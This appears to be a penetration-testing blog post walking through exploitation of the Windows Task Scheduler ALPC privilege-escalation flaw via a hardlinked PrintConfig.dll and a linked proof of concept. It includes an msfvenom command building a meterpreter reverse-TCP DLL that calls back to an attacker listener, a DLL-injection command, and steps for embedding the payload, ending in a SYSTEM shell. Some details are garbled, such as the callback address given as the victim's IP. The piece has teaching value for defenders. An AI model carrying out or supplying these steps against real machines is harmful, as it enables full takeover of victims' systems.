A Local privilege escalation vulnerability exists in Windows Task Scheduler Service, through which a local unprivileged user can change file permissions of an file leading to System privileges. This have a CVSS score of 7.8. Replacing a system file and then waiting for a privileged user to access it will escalate our privileges. The DLL (Dynamic Link Library) associated with Spoolsv.exe process could be replaced (through hardlink) and could be executed by Spoolsv.exe process to load it.
Understanding the Scenario
A process running with User a privileges must perform impersonation while a User B (logged on user) requests some resources process. This is the proper method in security context, now the process running with User A privileges impersonate User B privileges and then perform the action. After the action is complete the process revert back to its original privileges.
However the scenario here, Task scheduler is a process running with system privileges. The process must have to follow the desired way of impersonation while performing an action with different privileges but the process failed to do so. If User B (logged on user) requests SchRpcSetSecurity method, the process must impersonate the User B privileges and perform the action but it uses its own SYSTEM privileges to do. We will leverage this vulnerability and try to exploit the condition.
Advanced Local Inter-Process Communication (ALPC)
It is a high speed message based communication mechanism implemented in NT kernel. It can be used for communication between:
- Two User mode processes.
- One User mode and One Kernel mode drivers.
- Two Kernel mode drivers.
LPC is used throughout the local system and it is not used remotely. Remote Procedure Call (RPC) is used for communication between 2 different systems. ALPC was arrived in Windows Vista deprecating the use of LPC. The ALPC works in client server model and all the calls from Client to Server are asynchronous (Client/Server do not wait for the server to respond). The Local Security Authority Subsystem Service (LSASS), Session Manager (SMSS), and Service.
Control Manager all use (A)LPC ports directly to communicate with client processes. Winlogon and the Security Reference Monitor use it to communicate with the LSASS process.
Task Scheduler’s SchRpcSetSecurity method can be called by any local process which then sets a security descriptor on a file or folder through Advanced Local Inter-Process Communication. The above said method fails to impersonate the requesting process or client when setting security descriptor, which then leads to change of Access Control List (ACL) of the file or folder through Task Scheduler.
We will demonstrate the following through POC (https://github.com/bharadwajyas/TasScheduler_ALPC-Exploit )
- As any user can create a file under C:\Windows\tasks folder, the POC will create a file job which is a hardlink to the Spoolsv.exe process trusted PrintConfig.dll. Finding the location of PrintConfig.dll
- Changing permissions of UpdateTask.job by calling SchRpcSetSecurity Task Scheduler’s method. Modifying the permissions of the above file will update the permissions of the PrintConfig.dll file, which will become user modifiable.
- Replace dll with malicious DLL (which will give a reverse shell on our attacker machine).
- The modified dll will load and perform the attacker defined actions.
|Operating System||OS Version||Hotfix Applied||User Logged on||IPv4|
|Kali Linux||Kali 2017.2||root||192.168.245.145|
|Windows 10 (x64)||Microsoft Windows 10 Enterprise 2016 LTSB|
(10.0.14393 N/A Build 14393)
|admin user (under-privileged user)||192.168.245.134|
Open Process explorer with administrator privileges. Let’s have a look at the privileges of spoolsv.exe process (system).
The ‘adminuser’ is a member of Users group, we can verify it as follows:-
net user adminuser
Now open a command prompt with normal privileges and then open a notepad within the command prompt.
We can have a look at the spawned process on the process explorer.
It is clearly visible that the Process ID associated with the notepad process is 5068 (note this we will soon be using this in the exploit) which is spawned under cmd.exe process. We will now head straight to the exploit and run the following command (Note that we have opened the powershell window with Normal privileges).
After firing the exploit we found that the notepad is now running under spoolsv.exe process with SYSTEM privileges.
We will be hooking our own malicious DLL to the main DLL file (that would be injected to spoolsv.exe process). Currently, ALPC-TaskSched-LPE.dll file is hooked with exploit.dll present under ‘Resources’ folder which by default loads the notepad process to the spoolsv.exe process.
Using msfvenom we will generate a malicious DLL that will connect back to our attacking machine (kali box). As the target machine is a 64-bit architecture machine, we will be using the below shown payload.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.245.134 lport=444 -f dll > lol.dll
CFF explorer is a Portable Executable (PE) editor which support .NET framework, we will be using this to hook our malicious DLL to the original/final DLL (ALPC-TaskSched-LPE.dll). Hooking the malicious DLL to the original DLL file using CFF explorer as follows:-
The view of the CFF explorer will look like below figure. We need to Go to Resource Editor > RCDATA then select the malicious dll (lol.dll) to hook to the original dll.
The Contents of the exploit.dll is shown below. The RCDATA defines a raw data for an application. Raw data resources permit the inclusion of binary data directly in the executable file.
Select the malicious DLL from the console.
Overwrite the original file and save it. We have overwrite the original DLL file because it is written in the POC exploit that it load the DLL with the name ALPC-TaskSched-LPE.
Or we can just load a DLL with our own file name, modifying the original file name of the DLL in the exploit.
The malicious DLL file is loaded to the \x64\ALPC-TaskSched-LPE.dll
Now, we will open a new powershell window with normal privileges and start our listener on the attacker box (kali) on TCP port 444. Execute the following command and provide the Process ID of the notepad process.
Injectdll.exe 5068 \x64\ALPC-TaskSched-LPE.dll
The Process Explorer showing the newly spawned processes which connect back to the attacker machine (got after 5-10 retries ????)
And on the attacker machine, we got a system shell!!!
We can spawn a shell and have a look at the privileges.
We can verify the connection from the victim machine through:
The above discussed exploit works on most of the latest Windows products like Windows 10 (32 bit and 64 bit), Windows Server 2016. This blog is for educational purposes only and the author is not responsible for any misconduct behavior by the viewers. Stay tuned for our next blog post. Till then HacknPentest!!
Author: – Yash Bharadwaj
Maintained by: – Puneet Choudary